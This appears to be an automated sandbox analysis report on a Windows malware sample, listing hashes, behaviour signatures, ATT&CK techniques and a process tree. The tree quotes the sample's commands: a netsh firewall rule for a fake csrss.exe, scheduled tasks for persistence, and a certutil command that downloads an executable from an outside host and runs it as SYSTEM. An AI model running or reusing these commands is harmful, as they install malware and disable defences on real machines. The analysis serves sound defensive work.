Analysis

  • max time kernel
    26s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-11-2020 19:50

General

  • Target

    SecuriteInfo.com.BehavesLike.Win32.Generic.wc.21340.exe

  • Size

    3.9MB

  • MD5

    ca428635b70d5314dc97c8d22c66e0d5

  • SHA1

    1eb3b6220ec71d758761fdc36a6b579947b6b6c3

  • SHA256

    cd689e05263e010dd9c23607c7d8dee3e4d5c536232e8db22e9221bfbfe834ff

  • SHA512

    ca8670e93d84dcd9afe358fc2d862aa746305356909644e4509970b0b098f762a7258f79d826954cb3cd7b531bf8f2d597f59b3d5a1705a10804f83cbfeb2d67

Malware Config

Signatures

  • Windows security bypass 2 TTPs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 8 IoCs
  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • JavaScript code in executable 3 IoCs
  • Modifies service 2 TTPs 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 237 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.wc.21340.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.wc.21340.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2036
    • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.wc.21340.exe
      "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.BehavesLike.Win32.Generic.wc.21340.exe"
      2⤵
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:816
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies service
          • Modifies data under HKEY_USERS
          PID:1148
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        PID:1340
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2028
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotbooks.tech/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1700
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1848

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

2
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

4
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    MD5

    ca428635b70d5314dc97c8d22c66e0d5

    SHA1

    1eb3b6220ec71d758761fdc36a6b579947b6b6c3

    SHA256

    cd689e05263e010dd9c23607c7d8dee3e4d5c536232e8db22e9221bfbfe834ff

    SHA512

    ca8670e93d84dcd9afe358fc2d862aa746305356909644e4509970b0b098f762a7258f79d826954cb3cd7b531bf8f2d597f59b3d5a1705a10804f83cbfeb2d67

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
    MD5

    1afff8d5352aecef2ecd47ffa02d7f7d

    SHA1

    8b115b84efdb3a1b87f750d35822b2609e665bef

    SHA256

    c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

    SHA512

    e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe
    MD5

    ca428635b70d5314dc97c8d22c66e0d5

    SHA1

    1eb3b6220ec71d758761fdc36a6b579947b6b6c3

    SHA256

    cd689e05263e010dd9c23607c7d8dee3e4d5c536232e8db22e9221bfbfe834ff

    SHA512

    ca8670e93d84dcd9afe358fc2d862aa746305356909644e4509970b0b098f762a7258f79d826954cb3cd7b531bf8f2d597f59b3d5a1705a10804f83cbfeb2d67

  • \Windows\rss\csrss.exe
    MD5

    ca428635b70d5314dc97c8d22c66e0d5

    SHA1

    1eb3b6220ec71d758761fdc36a6b579947b6b6c3

    SHA256

    cd689e05263e010dd9c23607c7d8dee3e4d5c536232e8db22e9221bfbfe834ff

    SHA512

    ca8670e93d84dcd9afe358fc2d862aa746305356909644e4509970b0b098f762a7258f79d826954cb3cd7b531bf8f2d597f59b3d5a1705a10804f83cbfeb2d67

  • memory/564-28-0x000007FEF7E60000-0x000007FEF80DA000-memory.dmp
    Filesize

    2.5MB

  • memory/816-12-0x0000000000000000-mapping.dmp
  • memory/1148-13-0x0000000000000000-mapping.dmp
  • memory/1340-16-0x0000000000000000-mapping.dmp
  • memory/1340-19-0x0000000004EF0000-0x0000000004F01000-memory.dmp
    Filesize

    68KB

  • memory/1340-18-0x0000000004B40000-0x0000000004EE7000-memory.dmp
    Filesize

    3.7MB

  • memory/1928-11-0x0000000000400000-0x0000000000B10000-memory.dmp
    Filesize

    7.1MB

  • memory/1928-10-0x0000000004CF0000-0x0000000004D01000-memory.dmp
    Filesize

    68KB

  • memory/1928-9-0x0000000004940000-0x0000000004CE7000-memory.dmp
    Filesize

    3.7MB

  • memory/2036-0-0x0000000004AE0000-0x0000000004E87000-memory.dmp
    Filesize

    3.7MB

  • memory/2036-2-0x0000000000400000-0x0000000000B10000-memory.dmp
    Filesize

    7.1MB

  • memory/2036-1-0x0000000004E90000-0x0000000004EA1000-memory.dmp
    Filesize

    68KB